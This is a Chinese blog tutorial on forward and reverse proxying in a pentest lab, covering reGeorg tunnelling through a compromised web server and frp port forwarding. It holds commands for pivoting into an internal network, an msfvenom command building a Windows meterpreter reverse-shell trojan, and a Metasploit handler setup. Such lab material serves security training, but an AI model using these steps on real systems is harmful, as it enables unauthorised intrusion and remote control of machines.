演示正向代理与反向代理

最新推荐文章于 2024-04-17 09:51:54 发布
最新推荐文章于 2024-04-17 09:51:54 发布
阅读量969 收藏 18
点赞数 20
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45815516/article/details/134983108
版权

流量代理

正向代理

正向代理是客户端和其他所有服务器(重点:所有)的代理者

1、演示正向代理与反向代理

在这里插入图片描述
在这里插入图片描述

socks5协议

和http协议一样,都是应用层协议

目的:提供代理服务

作用:socks5客户端直接把想访问的ip发送给socks5服务器,当数据包到socks5服务器,socks5服务器会尝试发包到想访问的ip

正向代理实验

搭建实验环境

准备:

  • win11 nat一个网卡

  • server2016(失陷主机) nat vmnat1仅主机(配置静态ip 10.1.1.1)两个网卡

  • 内网主机(内网主机) 仅主机一个网卡(配置静态ip 10.1.1.2)

注意:phpstudy版本要调低一点,否则可能出问题

win11可以访问失陷主机的phpinfo.php

在这里插入图片描述

win11不可以访问内网主机的phpinfo.php

在这里插入图片描述

失陷主机可以访问内网主机的phpinfo.php

在这里插入图片描述

win11:

安装一个proxy
在这里插入图片描述

将reGeorg-master.zip压缩包放到win11,并且解压
在这里插入图片描述

在失陷主机server2016的web根目录下放一个文件

在这里插入图片描述

访问这个php文件,看到这个提示,说明成功

在这里插入图片描述

win11里搭建socks5服务

python2 .\reGeorgSocksProxy.py -p 8080 -u http://10.4.7.138/tunnel.nosocket.php

-u 会把本地socks5流量 发送给后面追加的链接

在这里插入图片描述

给proxy做配置

在这里插入图片描述

挂上代理

在这里插入图片描述

访问10.1.1.2可以访问了

在这里插入图片描述

安装客户端

在这里插入图片描述

作用:截取整个主机的所有可执行文件

给内网主机开启3389远程服务

在这里插入图片描述

使用攻击机远程连接内网主机

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

远程连接内网主机10.1.1.2
在这里插入图片描述
在这里插入图片描述

成功连接到内网主机

在这里插入图片描述

查看Proxifier

在这里插入图片描述

反向代理

反向代理是客户端和所要代理的服务器之间的代理。

在这里插入图片描述
在这里插入图片描述

流量转发工具

需要放在拿到shell的服务器上可使用

1.lcx

端口流量转发,不具备完整的proxy代理功能

2.msf

3.cobalt Strike

4.earthworm

5.reGeorg

本地的客户端可以使用

*windows*

1.proxifier

2.SocksCap64

linux

1.proxychains4

vim /etc/proxychains4.conf

反向代理实验

在这里插入图片描述

frp客户端向服务器发起连接请求,连接成功以后,服务器会把自己收到的流量转发给客户端

frp客户端和服务器都有自己的配置文件,服务器哪个端口接受的流量发送给客户端的哪个端口,都必须在配置文件写流量

搭建实验环境

  • kali nat模式

  • dmz主机(win7) 桥接模式

  • 真实机 服务端

真实机 配置frp服务端

frp_0.36.2_windows_amd64.zip 解压到桌面

!

frp_0.36.2_windows_amd64文件夹文件含义

在这里插入图片描述

客户端配置文件内容及含义

在这里插入图片描述

真实机 开启frp服务端
.\frps.exe -c frps.ini

在这里插入图片描述

回车一定要回车一下!!!!

在这里插入图片描述

kali 客户端 解压缩到桌面

tar xf frp_0.36.2_linux_amd64.tar.gz

在这里插入图片描述

┌──(kali㉿kali)-[~/Desktop]
└─$ cd frp_0.36.2_linux_amd64 
                                                                   
┌──(kali㉿kali)-[~/Desktop/frp_0.36.2_linux_amd64]
└─$ ls
frpc           frpc.ini  frps_full.ini  LICENSE
frpc_full.ini  frps      frps.ini       systemd

在这里插入图片描述

修改客户端的配置文件
[common]
server_addr = 10.9.47.193
server_port = 7000

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 6789
remote_port = 6789

在这里插入图片描述

local_port: 生成木马时木马要连接什么端口

remote_port:当远程主机的哪个端口接受流量时发送给本机

当10.9.47.193的6789端口收到流量时会发送给kali主机的6789端口

开启客户端服务
sudo ./frpc -c frpc.ini

在这里插入图片描述

真实机(服务端)显示连接成功

在这里插入图片描述

kali(客户端)生成一个木马

sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.47.193 LPORT=6789 -f exe -o test.exe

-p 指定的使用的payload

LHOST 连接哪个主机

LPORT 连接哪个端口

在这里插入图片描述

将生成的木马复制到dmz主机

将kaili的6789端口打开

sudo msfconsole

在这里插入图片描述

用于metasploit接收会话的模块

use exploit/multi/handler

在这里插入图片描述

设置payload

set payload windows/meterpreter/reverse_tcp

监听本地主机

set LHOST 127.0.0.1

监听哪个端口号

set LPORT 6789

跑一下

run

在这里插入图片描述

在这里插入图片描述

双击exe ,在kali监听的6789端口 执行命令,发现已经反弹到了win7里

在这里插入图片描述

芷若无尘
关注
  • 20
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
kali 代理简介
zhaghailiangji的博客
02-25 1686
proxy基本原理:正向代理(forward proxy),  反向代理(reverse proxy),   透明代理(transparente proxy)mitmproxy应用:mitmproxy -p 8800         //-p编辑的窗口,8800//端口HTTP proxy :127.0.01     8800    //监听请求   >>GET          //...
通过反向ssh连接+socks5+web-proxy来访问内网资源
蚂蚁大战大象
11-08 5139
最近碰到个这么个问题,校园网内的资源只能在校园网内访问,在寝室里连不到校园网时候就无法访问了,很不方便。所以想了一个方案来解决这个问题。 所需硬件:一台有公网IP的linux主机 A,一台在校园网内的Linux主机 B。 所需软件:openssh, delegated. 思路1.通过从B建立一个反向ssh连接到A上,建立一个ssh连接 C。 2.在B上通过C运行ssh连接D(该连接用于sock
反向socks5代理工具
我想做一个好人<svg/onload=Alert`1`>(
09-08 751
github.com/yuxiaokui/gohtran 闲来无事,用golang写了个反向socks5代理工具. 方便搞渗透的同学们使用. 首先在公网VPS上执行listener 3389 33333 3389端口是用来监听肉鸡上线的,后面的33333端口是开放的socks5服务端口. 然后在内网的肉鸡中执行client vps_ip:3389 webshell也可以玩哦. OK,配上socks5代理,尽情内网漫游吧. 本工具完全开源,大家随意修改. ...
反向代理是什么?为什么需要反向代理?底层原理是什么?
最新发布
长风破浪会有时的博客
04-17 288
反向代理服务器接收到客户端请求后,通过自身的路由机制将请求转发到内部服务器,然后将内部服务器的响应返回给客户端。此外,反向代理服务器还可以根据内部服务器的负载情况,动态调整请求的分发策略,实现负载均衡的功能。相比于正向代理反向代理是对客户端透明的,客户端无法直接访问内部服务器,所有请求都必须通过反向代理服务器转发。安全保护:反向代理可以隐藏内部服务器的真实IP地址,提高系统的安全性,防止攻击者直接访问内部服务器。静态资源缓存:反向代理可以缓存静态资源,减轻内部服务器的负载,提高系统的响应速度。
EW(EarthWorm) 反向 socks5 代理
为之的博客
12-14 1625
今天本想对学校的内网服务器进行人生中第一次横向渗透,奈何情况不允许,但好歹学习了一些东西,总要写下来保存 工具: EW:https://github.com/idlefire/ew proxychains:https://github.com/rofl0r/proxychains-ng 小米随身wifi:http://bigota.miwifi.com/xiaoqiang/miniwifi/miwifi_setup_1b601_848.exe phpstudy:https://m.x...
EW之Socks5反向代理内网穿透
sweetie 的博客
09-23 2327
EW(earthworm)功能介绍 EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。 准备阶段 在靶机网站上传一句话马使用蚁剑连接 ipconfig /all 一台外网vps:110.42.229.X 一台内网靶机:192.168.1.5(3389开放) 内网机器(无公网ip需要反弹到公网,需要在vps监听
nginx正向代理反向代理详解
09-29
本文给大家分享的是nginx实现正向代理反向代理的具体方法配置以及不同的实例情况,非常的详细,希望大家能够喜欢
正向代理反向代理PPT
04-16
有关正向代理反向代理的简单科普PPT,对于小白来说便于理解和结束,关于PPT的排版和颜色等方面也希望各位大佬能提供宝贵的建议
正向代理,apache,反向代理,Nginx
07-07
配置正向代理服务器使用,Nginx只能做反向代理,Apache24可以作正向代理
Nginx正向反向代理区别及原理解析
09-29
主要介绍了Nginx正向反向代理区别及原理解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
基于EarthWorm的正反向socks5代理
good good study
02-08 4144
EarthWorm是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处
PowerProxy:一款带有反向代理功能的PowerShell Socks代理工具
二狗的博客
02-09 739
PowerProxy专为渗透测试人员设计,在遍历阻止入站连接的网络时,反向代理功能肯定是要优先考虑的。在默认情况下,反向代理连接会经过加密处理,而Socks5连接也支持基于用户名和密码的身份验证。如果你的设备上没有安装OpenSSL的话,这需要使用你自己的证书,或者使用“–no-3、reverse_proxy_handler.py仅在类Unix系统上进行过测试,不确定是否支持Windows系统;Socks代理工具,该工具带有反向代理功能,可以帮助广大安全研究人员更加轻松地完成某些特定场景下的渗透测试任务。
反弹socks代理。
|独自望海。。。
07-12 3233
在内网渗透中,反弹socks代理是很必要的,大家都知道用lcx来转发端口,好像很少看到有人是直接反弹代理来连接。因为我们要连接内网的其 它机器,我们不可能一个一个的去中转端口连接,在当前控制的机器上开代理也没办法,因为对方在内网。所以我们就用反弹代理的方式。这种方式其实大家都明 白。  首先在本机监听:  c:/>hd -s -listen 53 1180  [+] Listening
Nginx详解 五:反向代理
m0_74170357的博客
09-06 1万+
正向代理代理的是客户端正向代理是一个位于客户端和目标服务器之间的代理服务器(中间服务器)。为了从目标服务器取得内容,客户端向代理服务器发送一个请求,并且指定目标服务器,之后代理向目标服务器转发请求,将获得的内容返回给客户端反向代理代理的是服务端反向代理:(reverse proxy),指的是代理外网用户的请求到内部的指定的服务器,并将数据返回给用户的一种方式客户端不直接与后端服务器进行通信,而是与反向代理服务器进行通信,隐藏了后端服务器的 IP 地址。
什么是反向代理(代理服务器解释
Pan_Chengyuan的博客
03-18 7768
反向代理是位于 Web 服务器前面的服务器,将客户端(例如 Web 浏览器)请求转发到这些 Web 服务器。反向代理通常用于帮助提高安全性、性能和可靠性。为了更好地理解反向代理的工作原理以及它可以提供的好处,让我们首先定义什么是代理服务器。转发代理,通常称为代理、代理服务器或 Web 代理,是位于一组客户端计算机前面的服务器。当这些计算机向 Internet 上的站点和服务发出请求时,代理服务器会拦截这些请求,然后像中间人一样代表这些客户端与 Web 服务器通信。
什么是反向代理
weixin_58286934的博客
07-18 1万+
代理和反向代理
反向代理】超全Nginx底层原理+案例实战+高可用集群搭建
互联网小阿祥
11-10 5361
超全Nginx原理+实战篇,超多案例实战,黑名单封禁、网络限速、静态资源服务器、LVS+Keepalived高可用等等。
什么是 反向代理
热门推荐
zhanjie2009的博客
02-01 2万+
什么是 反向代理 一、反向代理的定义 理解思路:无代理–>正向代理–>反向代理 【无代理】与有代理区别为: 主要表现:过滤不同、映射不同、权限不同。 【过滤】使用代理,可以对外界或内部的Internet地址进行过滤。 【映射】使用代理,多个用户使用代理访问外界时,只映射为一个IP地址。 【权限】使用代理,外界不能直接访问到内部网,同时限制内部网对外部的访问权限。 无代理,无以上特征。 【正向代理】: (内部网络用户向外网发送请求) 正向代理即通常所说的代理,用于代表内部网络用户向Intern
反向代理的概念你知道吗
简单点的博客
05-09 642
反向代理的概念你知道吗
nginx 正向代理反向代理
11-24
以下是nginx正向代理反向代理的介绍: 1. 正向代理正向代理是代理客户端,使得客户端可以通过代理服务器来访问其他服务器资源。在正向代理模式下,客户端不知道自己访问的是代理服务器,而不是真实服务器。正向代理的作用是隐藏客户端,保护客户端的隐私,同时可以加速访问速度,减轻服务器负担。Nginx可以通过配置文件实现正向代理,具体配置方法如下: ```nginx http { proxy_cache_path /data/nginx/cache levels=1:2 keys_zone=my_cache:10m inactive=60m; server { listen 80; server_name www.example.com; location / { proxy_pass http://192.168.1.100; proxy_set_header Host $host; proxy_cache my_cache; proxy_cache_valid 200 60m; } } } ``` 2. 反向代理反向代理是代理服务器,使得客户端可以通过代理服务器来访问其他服务器资源。在反向代理模式下,客户端不知道自己访问的是代理服务器,而不是真实服务器。反向代理的作用是隐藏服务器,保护服务器的隐私,同时可以实现负载均衡,提高服务器的性能和可靠性。Nginx可以通过配置文件实现反向代理,具体配置方法如下: ```nginx http { upstream backend { server 192.168.1.100:80; server 192.168.1.101:80; server 192.168.1.102:80; } server { listen 80; server_name www.example.com; location / { proxy_pass http://backend; proxy_set_header Host $host; } } } ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值